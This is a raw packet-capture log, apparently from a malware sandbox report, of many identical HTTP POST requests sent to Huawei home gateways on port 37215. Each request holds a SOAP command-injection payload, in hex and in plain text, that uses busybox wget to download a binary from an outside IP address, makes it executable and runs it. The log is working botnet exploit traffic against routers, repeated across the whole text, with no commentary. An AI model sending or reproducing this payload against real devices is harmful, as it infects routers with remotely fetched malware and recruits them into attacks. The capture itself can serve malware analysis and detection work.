                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            243192.168.2.1556026197.100.217.1837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.178801060 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            244192.168.2.1536464197.92.175.22337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.178847075 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            245192.168.2.1544468197.249.181.4737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.178847075 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            246192.168.2.1540446197.67.211.21037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.178859949 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            247192.168.2.1546632197.22.156.6037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.178888083 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            248192.168.2.1548914197.170.193.19537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.178910971 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            249192.168.2.1553902197.215.75.15337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.178958893 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            250192.168.2.1549208197.106.213.23237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.178985119 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            251192.168.2.1554876197.12.45.15937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.179004908 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            252192.168.2.1557076197.97.126.13637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.179029942 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
